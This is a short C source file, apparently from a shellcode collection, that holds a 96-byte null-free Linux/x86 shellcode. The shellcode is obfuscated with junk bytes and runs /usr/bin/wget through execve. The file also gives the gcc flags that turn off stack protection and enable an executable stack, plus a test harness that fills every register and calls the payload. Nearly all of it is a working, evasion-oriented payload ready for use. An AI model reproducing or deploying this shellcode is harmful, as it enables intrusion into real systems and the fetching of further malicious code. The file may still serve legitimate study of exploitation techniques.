/*
Mutated Execve Wget Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
mutated_execve_wget_shellcode
* 96 bytes
* null-free
* mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
# gcc -m32 -fno-stack-protector -z execstack mutated_execve_wget_shellcode.c -o mutated_execve_wget_shellcode
Testing
# ./mutated_execve_wget_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\xeb\x01\xe8\x29\xdb\x74\x01\x83\xf7\xe3"
"\xbd\xf5\xff\xff\xff\xeb\x01\xe8\x68\x41"
"\x65\x45\x72\x29\xf6\x74\x01\x83\x5e\x56"
"\x81\xf6\x25\x4a\x1f\x3e\x56\xeb\x01\x33"
"\x68\x69\x73\x2e\x67\x89\x44\x24\x0c\x89"
"\xe1\x6a\x74\xeb\x01\xe3\x68\x2f\x77\x67"
"\x65\xeb\x01\x83\x68\x2f\x62\x69\x6e\xeb"
"\x01\x33\x68\x2f\x75\x73\x72\x8d\x1c\x24"
"\xeb\x01\x83\x50\x51\x53\x89\xe1\xf7\xdd"
"\x95\xeb\x01\x83\xcd\x80";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}
